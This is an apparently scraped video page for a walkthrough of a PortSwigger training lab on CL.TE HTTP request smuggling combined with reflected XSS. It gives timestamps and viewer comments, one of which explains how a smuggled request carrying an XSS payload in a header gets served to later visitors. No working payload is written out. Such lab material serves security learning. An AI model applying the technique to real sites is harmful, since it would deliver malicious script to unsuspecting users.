Hey everyone! Check out this playlist for all my solutions to the HTTP Request Smuggling labs from PortSwigger - 👀 th-cam.com/play/PLGb2cDlBWRUX1_7RAIjRkZDYgAB3VbUSw.html Here are the timestamps for this video - ⏱ 00:00 - Intro 00:29 - Confirm the Reflected XSS vulnerability 02:11 - Detect the CL.TE vulnerability 03:53 - Confirm the CL.TE vulnerability 05:00 - Solve the lab
When you send the first request, the front-end send the entire body of the two requests combined as one to the back-end and that is why the first hit gives you a 200 ok. But keep in mind this request also contains the Smuggled request... in short, this is the reason we let burp update the content-length on its own... Now imagine what happens in the back-end server when it receives this. First, it sees the chunk of zero and takes it as the end of the first request hence 200 OK, but then it reads the second smuggled request which is poisoned in the Agent-Header by the XSS script. This means after the first request which was is not poisoned since the zero chunk terminated it, the second request will be poisoned by the payload. So everyone that visits the particular blog post right after we send our first request the back end server will serve them with the second smuggled request. This is whole idea of why its working. Cheers!
Hey everyone! Check out this playlist for all my solutions to the HTTP Request Smuggling labs from PortSwigger - 👀
th-cam.com/play/PLGb2cDlBWRUX1_7RAIjRkZDYgAB3VbUSw.html
Here are the timestamps for this video - ⏱
00:00 - Intro
00:29 - Confirm the Reflected XSS vulnerability
02:11 - Detect the CL.TE vulnerability
03:53 - Confirm the CL.TE vulnerability
05:00 - Solve the lab
love your work brother
love from Nepal
why are we able to do a get request with a body on the smuggled request? when i tried to do a normal request with a body it gets a 403 forbidden error
Why can't I find the vulnerability by sending a second normal request instead of refreshing the page?
i still don't get how it's delivered to the victim
When you send the first request, the front-end send the entire body of the two requests combined as one to the back-end and that is why the first hit gives you a 200 ok. But keep in mind this request also contains the Smuggled request... in short, this is the reason we let burp update the content-length on its own...
Now imagine what happens in the back-end server when it receives this. First, it sees the chunk of zero and takes it as the end of the first request hence 200 OK, but then it reads the second smuggled request which is poisoned in the Agent-Header by the XSS script. This means after the first request which was is not poisoned since the zero chunk terminated it, the second request will be poisoned by the payload. So everyone that visits the particular blog post right after we send our first request the back end server will serve them with the second smuggled request.
This is whole idea of why its working. Cheers!